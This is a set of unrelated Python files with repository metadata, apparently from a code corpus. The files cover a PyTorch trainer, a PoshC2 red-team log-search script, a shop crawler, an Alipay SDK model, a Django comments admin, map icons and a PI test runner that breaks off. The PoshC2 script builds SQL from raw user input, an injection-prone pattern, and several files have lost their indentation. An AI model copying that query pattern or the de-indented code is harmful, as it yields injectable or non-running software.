            if 'val_' + self.monitor in log:
                scalars['val_' + self.monitor] = log['val_' + self.monitor]
            self.summary_writer.add_scalars('Train', scalars, epoch)
        self.summary_writer.close()
    def _log_memory_usage(self):
        if not self.with_cuda: return
        template = """Memory Usage: \n{}"""
        usage = []
        for deviceID, device in self.gpus.items():
            deviceID = int(deviceID)
            allocated = torch.cuda.memory_allocated(deviceID) / (1024 * 1024)
            reserved = torch.cuda.memory_reserved(deviceID) / (1024 * 1024)  # formerly torch.cuda.memory_cached
            usage.append(' CUDA: {} Allocated: {} MB Reserved: {} MB \n'.format(device, allocated, reserved))
        content = ''.join(usage)
        content = template.format(content)
        self.logger.debug(content)
def _train_epoch(self, epoch):
"""
Training logic for an epoch
:param epoch: Current epoch number
"""
raise NotImplementedError
def _save_checkpoint(self, epoch, log, save_best=False):
"""
Saving checkpoints
:param epoch: current epoch number
:param log: logging information of the epoch
:param save_best: if True, rename the saved checkpoint to 'model_best.pth.tar'
"""
arch = type(self.model).__name__
state = {
'arch': arch,
'epoch': epoch,
'logger': self.train_logger,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
'monitor_best': self.monitor_best,
'config': self.config
}
filename = os.path.join(self.checkpoint_dir, 'checkpoint-epoch{:03d}-loss-{:.4f}.pth.tar'
.format(epoch, log['loss']))
torch.save(state, filename)
if save_best:
os.rename(filename, os.path.join(self.checkpoint_dir, 'model_best.pth.tar'))
self.logger.info("Saving current best: {} ...".format('model_best.pth.tar'))
else:
self.logger.info("Saving checkpoint: {} ...".format(filename))
def _resume_checkpoint(self, resume_path):
"""
Resume from saved checkpoints
:param resume_path: Checkpoint path to be resumed
"""
self.logger.info("Loading checkpoint: {} ...".format(resume_path))
checkpoint = torch.load(resume_path)
self.start_epoch = checkpoint['epoch'] + 1
self.monitor_best = checkpoint['monitor_best']
self.model.load_state_dict(checkpoint['state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer'])
if self.with_cuda:
for state in self.optimizer.state.values():
for k, v in state.items():
if isinstance(v, torch.Tensor):
                        state[k] = v.to(self.device)
self.train_logger = checkpoint['logger']
#self.config = checkpoint['config']
self.logger.info("Checkpoint '{}' (epoch {}) loaded".format(resume_path, self.start_epoch))
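# Usage sketch (not part of the original module): a concrete trainer only needs
# to implement _train_epoch and return a dict containing the monitored key
# (e.g. 'loss') plus optional 'metrics'/'val_metrics' lists; `data_loader`
# below is a hypothetical attribute supplied by the subclass.
class ExampleTrainer(BaseTrainer):
    def __init__(self, data_loader, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.data_loader = data_loader
    def _train_epoch(self, epoch):
        self.model.train()
        total_loss = 0.0
        for images, targets in self.data_loader:
            self.optimizer.zero_grad()
            loss = self.loss(self.model(images.to(self.device)), targets.to(self.device))
            loss.backward()
            self.optimizer.step()
            total_loss += loss.item()
        return {'loss': total_loss / len(self.data_loader), 'metrics': []}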
|
bc97cd90d9b893ef27632fe4868a94106c81643c
|
3e00405025535eb1a1829b70f9e984ea9bb76fc5
|
/resources/scripts/fpc.py
|
c10f407ce3c24c1a0072fc1ff17fb875a007b9d9
|
[
"BSD-3-Clause"
] |
permissive
|
nettitude/PoshC2
|
5d1fdfbd53ee82e6fb145bde5cbb1afc6b2067ed
|
517903431ab43e6d714b24b0752ba111f5d4c2f1
|
refs/heads/master
| 2023-08-24T17:45:43.198409
| 2022-07-12T11:12:28
| 2022-08-01T09:09:15
| 141,987,967
| 1,378
| 299
|
BSD-3-Clause
| 2023-07-23T22:14:04
| 2018-07-23T08:53:32
|
PowerShell
|
UTF-8
|
Python
| false
| false
| 2,692
|
py
|
fpc.py
|
#!/usr/bin/env python3
import sys, argparse, os, pandas
class Colours:
BLUE = '\033[94m'
GREEN = '\033[92m'
RED = '\033[91m'
END = '\033[0m'
YELLOW = '\033[93m'
def create_arg_parser():
parser = argparse.ArgumentParser(description='Find Posh Command - Search for a PoshC2 Command Output')
parser.add_argument("-p", "--project", help='The PoshC2 project dir', default = '/opt/PoshC2_Project')
parser.add_argument("-d", "--database_type", help="The database type (SQLite/Postgres)", default = 'SQLite')
parser.add_argument("-pg", "--postgres_string", help="The postgres connection string (if using postgres)", default = '')
parser.add_argument("-c", "--command", help='The command to search for', default = '%')
parser.add_argument("-u", "--user", help='The user to filter on', default = '%')
parser.add_argument("-o", "--output", help='The output to search for', default = '%')
parser.add_argument("-t", "--taskid", help='The taskid to search for', default = '%')
return parser
def get_db_connection(args):
conn = None
if args.database_type.lower() == "postgres":
import psycopg2
conn = psycopg2.connect(args.postgres_string)
else:
db_path = os.path.join(args.project, 'PowershellC2.SQLite')
if not os.path.exists(db_path):
print(f"[-] Database does not exist: {db_path}")
sys.exit(1)
import sqlite3
conn = sqlite3.connect(db_path)
conn.text_factory = str
conn.row_factory = sqlite3.Row
return conn
def main():
args = create_arg_parser().parse_args()
conn = get_db_connection(args)
if args.command == '%' and args.output == '%' and args.taskid == '%':
print("%s[-] A minimum of a --command, --taskid or --output search term must be specified%s" % (Colours.RED, Colours.END))
sys.exit(1)
    with pandas.option_context('display.max_rows', None, 'display.max_columns', None, 'display.max_colwidth', None):
output = pandas.read_sql_query("SELECT SentTime,CompletedTime,User,Command,Output,TaskId from Tasks where User like '%s' and Command like '%%%s%%' and Output like '%%%s%%' and CAST(TaskId as text) like '%%%s%%'" % (args.user, args.command, args.output, args.taskid), conn)
for entry in output.values:
print("\n%s[*][*][*] Task %05d Command (Issued: %s by %s):\n%s" % (Colours.GREEN, entry[5], entry[0], entry[2], Colours.END))
print(entry[3])
print("\n%s[*][*][*] Task %05d Output (Completed: %s):\n%s" % (Colours.BLUE, entry[5], entry[1], Colours.END))
print(entry[4])
print()
if __name__ == '__main__':
main()
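# A safer variant (a sketch, not part of the original script): the query above
# interpolates user input directly into the SQL string, so a parameterized form
# avoids both quoting bugs and SQL injection; the placeholder style differs per
# driver ('?' for sqlite3, '%s' for psycopg2).
#
#     query = ("SELECT SentTime, CompletedTime, User, Command, Output, TaskId "
#              "FROM Tasks WHERE User LIKE ? AND Command LIKE ? "
#              "AND Output LIKE ? AND CAST(TaskId AS text) LIKE ?")
#     params = (args.user, f"%{args.command}%", f"%{args.output}%", f"%{args.taskid}%")
#     output = pandas.read_sql_query(query, conn, params=params)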
|
fead24b06f6f19af876a83481fc138198640ef42
|
08690eb8fc250e29d749d6baa694a16c03d3ad71
|
/backend/data/crawler/lotte_crawler.py
|
8c1c7e0bd00746fc08b5cefa362822f64d8820e3
|
[
"MIT"
] |
permissive
|
NullFull/isnamyang
|
de1e0e16a45c120cefec4500afe6ab38d44ea2c0
|
20a21f233d8234365739ed8514dcac25c98e51e6
|
refs/heads/main
| 2023-07-19T23:41:29.073366
| 2023-05-08T06:06:54
| 2023-05-08T06:06:54
| 184,061,909
| 117
| 26
|
MIT
| 2023-09-06T15:16:45
| 2019-04-29T11:53:09
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,396
|
py
|
lotte_crawler.py
|
import pandas as pd
from selenium import webdriver
import csv
CHROME_DRIVER_PATH = '/Users/jiwoo/Documents/chromedriver'
FILE_PATH = 'products.csv'
def crawler(keyword):
url = 'http://www.lottemart.com/search/search.do?searchTerm='
url = url + keyword
driver = webdriver.Chrome(CHROME_DRIVER_PATH)
driver.get(url)
df = pd.read_csv(FILE_PATH)
with open(FILE_PATH, 'a') as f:
f.write('\n')
    while True:
        try:
            product_list = driver.find_elements_by_xpath('//*[@class="product-article"][@data-panel="product"]/div/a')
            for product in product_list:
                product_code = product.get_attribute("data-prod-cd")
                product_name = product.find_element_by_xpath('.//img').get_attribute("alt")
                print(product_name, product_code)
                df['바코드'] = product_code
                df['제품명'] = product_name
                df.to_csv(FILE_PATH, mode='a', header=False, line_terminator='\n', index=False)
            # Click through to the next page
            next_btn = driver.find_element_by_xpath('//a[@class="page-next"]')
            next_btn.send_keys("\n")  # send Enter to the button
        except KeyboardInterrupt:
            break
        except Exception:
            # No next-page button (or any other failure) ends the crawl
            break
    driver.close()
if __name__ == "__main__":
crawler("남양")
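# Note (a sketch, assuming Selenium 4+): the find_element(s)_by_* helpers and
# the positional driver-path argument used above were removed in Selenium 4;
# the modern equivalents are:
#
#     from selenium.webdriver.common.by import By
#     from selenium.webdriver.chrome.service import Service
#     driver = webdriver.Chrome(service=Service(CHROME_DRIVER_PATH))
#     product_list = driver.find_elements(By.XPATH, '//*[@class="product-article"][@data-panel="product"]/div/a')
#     next_btn = driver.find_element(By.XPATH, '//a[@class="page-next"]')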
|
40996c04bef8c01a3a504b1e4f48036756f48aad
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AlipayCommerceEducateCreditbankStudyprofileModifyModel.py
|
522193b9ec6ac995955febbf959127c0ab8f1d30
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 6,966
|
py
|
AlipayCommerceEducateCreditbankStudyprofileModifyModel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.CreditBankCertificateExperience import CreditBankCertificateExperience
from alipay.aop.api.domain.CreditBankCredit import CreditBankCredit
from alipay.aop.api.domain.CreditBankTraining import CreditBankTraining
class AlipayCommerceEducateCreditbankStudyprofileModifyModel(object):
def __init__(self):
self._cb_id = None
self._certificate_experience = None
self._certificate_num = None
self._channel = None
self._credit = None
self._credit_num = None
self._training = None
self._training_num = None
self._user_id = None
@property
def cb_id(self):
return self._cb_id
@cb_id.setter
def cb_id(self, value):
self._cb_id = value
@property
def certificate_experience(self):
return self._certificate_experience
@certificate_experience.setter
def certificate_experience(self, value):
if isinstance(value, list):
self._certificate_experience = list()
for i in value:
if isinstance(i, CreditBankCertificateExperience):
self._certificate_experience.append(i)
else:
self._certificate_experience.append(CreditBankCertificateExperience.from_alipay_dict(i))
@property
def certificate_num(self):
return self._certificate_num
@certificate_num.setter
def certificate_num(self, value):
self._certificate_num = value
@property
def channel(self):
return self._channel
@channel.setter
def channel(self, value):
self._channel = value
@property
def credit(self):
return self._credit
@credit.setter
def credit(self, value):
if isinstance(value, list):
self._credit = list()
for i in value:
if isinstance(i, CreditBankCredit):
self._credit.append(i)
else:
self._credit.append(CreditBankCredit.from_alipay_dict(i))
@property
def credit_num(self):
return self._credit_num
@credit_num.setter
def credit_num(self, value):
self._credit_num = value
@property
def training(self):
return self._training
@training.setter
def training(self, value):
if isinstance(value, list):
self._training = list()
for i in value:
if isinstance(i, CreditBankTraining):
self._training.append(i)
else:
self._training.append(CreditBankTraining.from_alipay_dict(i))
@property
def training_num(self):
return self._training_num
@training_num.setter
def training_num(self, value):
self._training_num = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.cb_id:
if hasattr(self.cb_id, 'to_alipay_dict'):
params['cb_id'] = self.cb_id.to_alipay_dict()
else:
params['cb_id'] = self.cb_id
if self.certificate_experience:
if isinstance(self.certificate_experience, list):
for i in range(0, len(self.certificate_experience)):
element = self.certificate_experience[i]
if hasattr(element, 'to_alipay_dict'):
self.certificate_experience[i] = element.to_alipay_dict()
if hasattr(self.certificate_experience, 'to_alipay_dict'):
params['certificate_experience'] = self.certificate_experience.to_alipay_dict()
else:
params['certificate_experience'] = self.certificate_experience
if self.certificate_num:
if hasattr(self.certificate_num, 'to_alipay_dict'):
params['certificate_num'] = self.certificate_num.to_alipay_dict()
else:
params['certificate_num'] = self.certificate_num
if self.channel:
if hasattr(self.channel, 'to_alipay_dict'):
params['channel'] = self.channel.to_alipay_dict()
else:
params['channel'] = self.channel
if self.credit:
if isinstance(self.credit, list):
for i in range(0, len(self.credit)):
element = self.credit[i]
if hasattr(element, 'to_alipay_dict'):
self.credit[i] = element.to_alipay_dict()
if hasattr(self.credit, 'to_alipay_dict'):
params['credit'] = self.credit.to_alipay_dict()
else:
params['credit'] = self.credit
if self.credit_num:
if hasattr(self.credit_num, 'to_alipay_dict'):
params['credit_num'] = self.credit_num.to_alipay_dict()
else:
params['credit_num'] = self.credit_num
if self.training:
if isinstance(self.training, list):
for i in range(0, len(self.training)):
element = self.training[i]
if hasattr(element, 'to_alipay_dict'):
self.training[i] = element.to_alipay_dict()
if hasattr(self.training, 'to_alipay_dict'):
params['training'] = self.training.to_alipay_dict()
else:
params['training'] = self.training
if self.training_num:
if hasattr(self.training_num, 'to_alipay_dict'):
params['training_num'] = self.training_num.to_alipay_dict()
else:
params['training_num'] = self.training_num
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayCommerceEducateCreditbankStudyprofileModifyModel()
if 'cb_id' in d:
o.cb_id = d['cb_id']
if 'certificate_experience' in d:
o.certificate_experience = d['certificate_experience']
if 'certificate_num' in d:
o.certificate_num = d['certificate_num']
if 'channel' in d:
o.channel = d['channel']
if 'credit' in d:
o.credit = d['credit']
if 'credit_num' in d:
o.credit_num = d['credit_num']
if 'training' in d:
o.training = d['training']
if 'training_num' in d:
o.training_num = d['training_num']
if 'user_id' in d:
o.user_id = d['user_id']
return o
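def _example_round_trip():
    # Usage sketch (not part of the SDK; the values are hypothetical): the
    # generated models convert between typed objects and plain dicts via
    # to_alipay_dict/from_alipay_dict.
    model = AlipayCommerceEducateCreditbankStudyprofileModifyModel()
    model.user_id = '2088000000000000'
    model.credit_num = 3
    payload = model.to_alipay_dict()   # {'user_id': '2088000000000000', 'credit_num': 3}
    return AlipayCommerceEducateCreditbankStudyprofileModifyModel.from_alipay_dict(payload)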
|
650393ba1ec57e60edfe5527dc1c5550b9b8df8a
|
6f8c004f00db188e9bce68b2e433e49fef4ad4e4
|
/django_comments/admin.py
|
cf3117bb98ec824ff928175529f10e0502b24095
|
[] |
permissive
|
django/django-contrib-comments
|
915ea548bb57cb50b98fecb1bbd6e5b0b399cd58
|
4ad4c701f2a17ca62f040e94d73c2eb08af320e9
|
refs/heads/master
| 2023-08-30T23:59:23.712723
| 2023-08-16T18:55:12
| 2023-08-22T12:03:11
| 8,710,168
| 564
| 218
|
BSD-3-Clause
| 2023-08-22T12:03:12
| 2013-03-11T18:27:37
|
Python
|
UTF-8
|
Python
| false
| false
| 3,639
|
py
|
admin.py
|
from django.contrib import admin
from django.contrib.auth import get_user_model
from django.utils.translation import gettext_lazy as _, ngettext
from django_comments import get_model
from django_comments.views.moderation import perform_flag, perform_approve, perform_delete
class UsernameSearch:
"""The User object may not be auth.User, so we need to provide
a mechanism for issuing the equivalent of a .filter(user__username=...)
search in CommentAdmin.
"""
def __str__(self):
return 'user__%s' % get_user_model().USERNAME_FIELD
class CommentsAdmin(admin.ModelAdmin):
fieldsets = (
(
None,
{'fields': ('content_type', 'object_pk', 'site')}
),
(
_('Content'),
{'fields': ('user', 'user_name', 'user_email', 'user_url', 'comment')}
),
(
_('Metadata'),
{'fields': ('submit_date', 'ip_address', 'is_public', 'is_removed')}
),
)
list_display = ('name', 'content_type', 'object_pk', 'ip_address', 'submit_date', 'is_public', 'is_removed')
list_filter = ('submit_date', 'site', 'is_public', 'is_removed')
date_hierarchy = 'submit_date'
ordering = ('-submit_date',)
raw_id_fields = ('user',)
search_fields = ('comment', UsernameSearch(), 'user_name', 'user_email', 'user_url', 'ip_address')
actions = ["flag_comments", "approve_comments", "remove_comments"]
def get_actions(self, request):
actions = super().get_actions(request)
# Only superusers should be able to delete the comments from the DB.
if not request.user.is_superuser and 'delete_selected' in actions:
actions.pop('delete_selected')
if not request.user.has_perm('django_comments.can_moderate'):
if 'approve_comments' in actions:
actions.pop('approve_comments')
if 'remove_comments' in actions:
actions.pop('remove_comments')
return actions
def flag_comments(self, request, queryset):
self._bulk_flag(request, queryset, perform_flag,
lambda n: ngettext('flagged', 'flagged', n))
flag_comments.short_description = _("Flag selected comments")
def approve_comments(self, request, queryset):
self._bulk_flag(request, queryset, perform_approve,
lambda n: ngettext('approved', 'approved', n))
approve_comments.short_description = _("Approve selected comments")
def remove_comments(self, request, queryset):
self._bulk_flag(request, queryset, perform_delete,
lambda n: ngettext('removed', 'removed', n))
remove_comments.short_description = _("Remove selected comments")
def _bulk_flag(self, request, queryset, action, done_message):
"""
Flag, approve, or remove some comments from an admin action. Actually
calls the `action` argument to perform the heavy lifting.
"""
n_comments = 0
for comment in queryset:
action(request, comment)
n_comments += 1
msg = ngettext('%(count)s comment was successfully %(action)s.',
'%(count)s comments were successfully %(action)s.',
n_comments)
self.message_user(request, msg % {'count': n_comments, 'action': done_message(n_comments)})
# Only register the default admin if the model is the built-in comment model
# (this won't be true if there's a custom comment app).
Klass = get_model()
if Klass._meta.app_label == "django_comments":
admin.site.register(Klass, CommentsAdmin)
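# Sketch (not part of this module; MyComment and is_spam are hypothetical):
# projects using a custom comment model can reuse CommentsAdmin by registering
# it themselves, since the automatic registration above only covers the
# built-in model.
#
#     from django_comments.admin import CommentsAdmin
#     from myapp.models import MyComment
#
#     @admin.register(MyComment)
#     class MyCommentAdmin(CommentsAdmin):
#         list_display = CommentsAdmin.list_display + ('is_spam',)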
|
624fa78d72b86bada2b9d7fee142db0968b04656
|
8fbd7dcd16334ba7f0bc22268d7691d293fb74a6
|
/flask_googlemaps/icons.py
|
52d1cd5d4649949c9b413c6349d89add913e9dae
|
[
"MIT"
] |
permissive
|
flask-extensions/Flask-GoogleMaps
|
4629daa73aa86bd6f5e9086bb25a180d3c43ce2b
|
6d891695e8272416880180b1c048d3be38ad4742
|
refs/heads/master
| 2023-08-16T01:14:46.926121
| 2022-11-28T20:37:28
| 2022-11-28T20:37:28
| 14,603,772
| 195
| 84
|
MIT
| 2022-11-28T20:37:30
| 2013-11-21T23:52:29
|
Python
|
UTF-8
|
Python
| false
| false
| 6,365
|
py
|
icons.py
|
"""
The idea is to implement all icons from here:
http://kml4earth.appspot.com/icons.html#mapfiles
and
http://jg.org/mapping/icons.html
and
http://mabp.kiev.ua/2010/01/12/google-map-markers/
"""
__all__ = ["dots", "alpha", "shapes", "pushpin", "paddle"]
from typing import Optional, List
class Icon(object):
    """Dynamically build an icon URL from the accessed attribute name"""
def __init__(self, base_url, options=None):
# type: (str, Optional[List[str]]) -> None
self.base_url = base_url
self.options = options
def __getattr__(self, item):
return self.base_url.format(item)
dots = Icon(
base_url="//maps.google.com/mapfiles/ms/icons/{0}-dot.png",
options=["blue", "yellow", "green", "red", "pink", "purple", "orange"],
) # type: Icon
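# Usage sketch (not part of the original module): attribute access is routed
# through Icon.__getattr__, which simply formats the attribute name into
# base_url; the `options` list documents known names but is not validated.
assert dots.blue == "//maps.google.com/mapfiles/ms/icons/blue-dot.png"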
alpha = Icon(
base_url="//www.google.com/mapfiles/marker{0}.png",
options=[
"A",
"B",
"C",
"D",
"E",
"F",
"G",
"H",
"I",
"J",
"K",
"L",
"M",
"N",
"O",
"P",
"Q",
"R",
"S",
"T",
"U",
"V",
"X",
"Z",
"W",
"Y",
],
) # type: Icon
shapes = Icon(
base_url="//maps.google.com/mapfiles/kml/shapes/{0}.png",
options=[
"airports",
"arrow",
"arrow-reverse",
"arts",
"bars",
"broken_link",
"bus",
"cabs",
"camera",
"campfire",
"campground",
"capital_big",
"capital_big_highlight",
"capital_small",
"capital_small_highlight",
"caution",
"church",
"coffee",
"convenience",
"cross-hairs",
"cross-hairs_highlight",
"cycling",
"dining",
"dollar",
"donut",
"earthquake",
"electronics",
"euro",
"falling_rocks",
"ferry",
"firedept",
"fishing",
"flag",
"forbidden",
"gas_stations",
"golf",
"grocery",
"heliport",
"highway",
"hiker",
"homegardenbusiness",
"horsebackriding",
"hospitals",
"info",
"info-i",
"info_circle",
"lodging",
"man",
"marina",
"mechanic",
"motorcycling",
"mountains",
"movies",
"open-diamond",
"parking_lot",
"parks",
"partly_cloudy",
"pharmacy_rx",
"phone",
"picnic",
"placemark_circle",
"placemark_circle_highlight",
"placemark_square",
"placemark_square_highlight",
"play",
"poi",
"police",
"polygon",
"post_office",
"rail",
"rainy",
"ranger_station",
"realestate",
"road_shield1",
"road_shield2",
"road_shield3",
"ruler",
"sailing",
"salon",
"schools",
"shaded_dot",
"shopping",
"ski",
"snack_bar",
"snowflake_simple",
"square",
"star",
"subway",
"sunny",
"swimming",
"target",
"terrain",
"thunderstorm",
"toilets",
"trail",
"tram",
"triangle",
"truck",
"volcano",
"water",
"webcam",
"wheel_chair_accessible",
"woman",
"yen",
],
) # type: Icon
pushpin = Icon(
base_url="//maps.google.com/mapfiles/kml/pushpin/{0}.png",
options=[
"blue-pushpin",
"grn-pushpin",
"ltblu-pushpin",
"pink-pushpin",
"purple-pushpin",
"red-pushpin",
"wht-pushpin",
"ylw-pushpin",
],
) # type: Icon
paddle = Icon(
base_url="//maps.google.com/mapfiles/kml/paddle/{0}.png",
options=[
"1-lv",
"2-lv",
"3-lv",
"4-lv",
"5-lv",
"6-lv",
"7-lv",
"8-lv",
"9-lv",
"10-lv",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"10",
"A",
"B",
"C",
"D",
"E",
"F",
"G",
"H",
"I",
"J",
"K",
"L",
"M",
"N",
"O",
"P",
"Q",
"R",
"S",
"T",
"U",
"V",
"X",
"W",
"Y",
"Z",
"blu-blank-lv",
"blu-blank",
"blu-circle-lv",
"blu-circle",
"blu-diamond-lv",
"blu-diamond",
"blu-square-lv",
"blu-square",
"blu-stars-lv",
"blu-stars",
"grn-blank-lv",
"grn-blank",
"grn-circle-lv",
"grn-circle",
"grn-diamond-lv",
"grn-diamond",
"grn-square-lv",
"grn-square",
"grn-stars-lv",
"grn-stars",
"ltblu-blank",
"ltblu-circle",
"ltblu-diamond",
"ltblu-square",
"ltblu-stars",
"pink-blank",
"pink-circle",
"pink-diamond",
"pink-square",
"pink-stars",
"purple-blank",
"purple-circle-lv",
"purple-circle",
"purple-diamond-lv",
"purple-diamond",
"purple-square-lv",
"purple-square",
"purple-stars-lv",
"purple-stars",
"red-circle-lv",
"red-circle",
"red-diamond-lv",
"red-diamond",
"red-square-lv",
"red-square",
"red-stars-lv",
"red-stars",
"wht-blank",
"wht-blank-lv",
"wht-circle-lv",
"wht-circle",
"wht-diamond-lv",
"wht-diamond",
"wht-square-lv",
"wht-square",
"wht-stars-lv",
"wht-stars",
"ylw-blank",
"ylw-blank-lv",
"ylw-circle-lv",
"ylw-circle",
"ylw-diamond-lv",
"ylw-diamond",
"ylw-square-lv",
"ylw-square",
"ylw-stars-lv",
"ylw-stars",
"orange-blank",
"orange-circle",
"orange-diamond",
"orange-square",
"orange-stars",
"go-lv",
"go",
"pause-lv",
"pause",
"stop-lv",
"stop",
"route",
],
) # type: Icon
|
39cbd1287ceb781936bfb76d9c19551dfaab1792
|
ad1d46b4ec75ef1f00520ff246d0706c6bb7770e
|
/content/chapters/transform-strings/10.py
|
abc82de1f7338e66f6a82312d9fe32688dd3c23d
|
[] |
no_license
|
roberto-arista/PythonForDesigners
|
036f69bae73095b6f49254255fc473a8ab7ee7bb
|
1a781ea7c7ee21e9c64771ba3bf5634ad550692c
|
refs/heads/master
| 2022-02-24T15:28:04.167558
| 2021-09-07T10:37:01
| 2021-09-07T10:37:01
| 168,937,263
| 103
| 37
| null | 2022-02-11T02:24:01
| 2019-02-03T11:17:51
|
Python
|
UTF-8
|
Python
| false
| false
| 216
|
py
|
10.py
|
print(f"{'a':^10}")
print(f"{'bcd':^10}")
print(f"{'efghi':^10}")
print(f"{'jklmnop':^10}")
print(f"{'qrstu':^10}")
print(f"{'vwx':^10}")
print(f"{'y':^10}")
#     a
#    bcd
#   efghi
#  jklmnop
#   qrstu
#    vwx
#     y
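# Not part of the original example: ':^10' centers each string in a field 10
# characters wide; when the padding is odd, Python puts the extra space on the
# right, so f"{'a':^10}" == '    a     ' (4 spaces left, 5 right).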
|
9c81acc4a2aef1e8a06226f621ed5b14adb8f370
|
f6f6d13ecabee843ad4b41aae301e1bad1a07bdb
|
/tests/CLI/run_one_test.py.in
|
47085f7a6c42c12e683f5e15445be23f93c32105
|
[
"Apache-2.0"
] |
permissive
|
p4lang/PI
|
ec6a912f77f3ed73516a844ea5ca9fdb74c0e774
|
6d0f3d6c08d595f65c7d96fd852d9e0c308a6f30
|
refs/heads/main
| 2023-08-30T02:44:12.127320
| 2023-08-21T16:45:07
| 2023-08-21T16:45:07
| 51,870,280
| 170
| 128
|
Apache-2.0
| 2023-09-11T09:52:09
| 2016-02-16T21:07:15
|
C++
|
UTF-8
|
Python
| false
| false
| 7,563
|
in
|
run_one_test.py.in
|
#!/usr/bin/env python3
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Antonin Bas (antonin@barefootnetworks.com)
#
#
import sys
import subprocess
import os
import time
import random
import re
import io
import tempfile
sswitch_path = "@BM_SIMPLE_SWITCH@"
CLI_path = os.path.join("@abs_top_builddir@", "CLI", "pi_CLI_rpc")
rpc_server_path = os.path.join("@abs_top_builddir@", "bin", "pi_rpc_server")
valgrind_supp = os.path.join("@abs_srcdir@", "test.supp")
# Class written by Mihai Budiu, for Barefoot Networks, Inc.
class ConcurrentInteger(object):
# Generates exclusive integers in a range 0-max
# in a way which is safe across multiple processes.
# It uses a simple form of locking using folder names.
# This is necessary because this script may be invoked
# concurrently many times by make, and we need the many simulator instances
# to use different port numbers.
def __init__(self, folder, max):
self.folder = folder
self.max = max
def lockName(self, value):
return "lock_" + str(value)
def release(self, value):
os.rmdir(self.lockName(value))
def generate(self):
# try 10 times
for i in range(0, 10):
index = random.randint(0, self.max)
file = self.lockName(index)
try:
os.makedirs(file)
os.rmdir(file)
return index
            except OSError:
time.sleep(1)
continue
return None
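# The locking idea above works because directory creation is atomic and
# os.makedirs raises if the path already exists, so a successful call doubles
# as acquiring a named lock. A minimal sketch of the pattern:
#
#     try:
#         os.makedirs("lock_42")      # acquire; raises OSError if already held
#         # ... critical section ...
#     finally:
#         os.rmdir("lock_42")         # release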
def process_valgrind_output(stderr, name):
f_name = None
v = None
with tempfile.NamedTemporaryFile(delete=False, mode="w+") as f:
print("Valgrind output for", name, "written to", f.name)
f_name = f.name
        while True:
            L = stderr.readline()
            if sys.version_info >= (3, 0):
                # force string conversion for Python2 and Python3 compatibility
                L = L.decode()
            if not L:
                # EOF reached without an "ERROR SUMMARY" line; stop instead of
                # spinning forever on empty reads
                break
            f.write(L)
            if "ERROR SUMMARY" in L:
                m = re.search("ERROR SUMMARY: ([0-9]*) errors "
                              "from ([0-9]*) contexts", L)
                assert(m.lastindex == 2)
                v = (int(m.group(1)) == 0) and (int(m.group(2)) == 0)
                break
if v: # success, we can remove files
os.remove(f_name)
return v
def main():
def fail_msg(msg):
print(msg)
sys.exit(1)
if len(sys.argv) != 4:
fail_msg("Invalid number of arguments")
testdata_dir = sys.argv[1]
testname = sys.argv[2]
jsonname = sys.argv[3]
command_path = os.path.join(testdata_dir, testname + ".in")
output_path = os.path.join(testdata_dir, testname + ".out")
json_path = os.path.join(testdata_dir, jsonname)
concurrent = ConcurrentInteger(os.getcwd(), 1000)
rand = concurrent.generate()
if rand is None:
fail_msg("Error when generating random port number")
thrift_port = str(9090 + rand)
device_id = str(rand)
rpc_path = "/tmp/pi_rpc_{}.ipc".format(rand)
rpc_addr = "ipc://{}".format(rpc_path)
# start simple_switch
simple_switch_p = subprocess.Popen(
[sswitch_path, json_path, "--thrift-port", thrift_port,
"--device-id", device_id, "--", "--enable-swap"],
stdout=subprocess.PIPE)
bmv2_notifications_rpc_path = "/tmp/bmv2-{}-notifications.ipc".format(
device_id)
    with_valgrind = (os.getenv("PI_TEST_WITH_VALGRIND") is not None)
valgrind_with_options = ["valgrind"]
# third-party code shows memory leaks
# valgrind_with_options += ["--leak-check=full", "--show-reachable=yes"]
valgrind_with_options += ["--suppressions={}".format(valgrind_supp)]
# Valgrind output is sent to stderr, which we will analyze later
if with_valgrind:
rpc_server_cmd = ["libtool", "--mode=execute"] + valgrind_with_options
else:
rpc_server_cmd = []
rpc_server_cmd += [rpc_server_path]
rpc_server_p = subprocess.Popen(rpc_server_cmd + ["-a", rpc_addr],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
    def remove_rpc():
        try:
            os.remove(rpc_path)
        except OSError:
            pass
        try:
            os.remove(bmv2_notifications_rpc_path)
        except OSError:
            pass
def fail(msg):
rpc_server_p.terminate()
simple_switch_p.terminate()
remove_rpc()
fail_msg(msg)
time.sleep(1)
if with_valgrind:
cmd = ["libtool", "--mode=execute"] + valgrind_with_options
else:
cmd = []
cmd += [CLI_path, "-c", os.path.abspath(json_path), "-a", rpc_addr]
# use 8589934592 to test 64-bit device id support
input_ = "assign_device 8589934592 0 {} -- port={}\n".format(
os.path.abspath(json_path), thrift_port)
with open(command_path, "r") as f:
input_ += f.read()
out = None
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=testdata_dir)
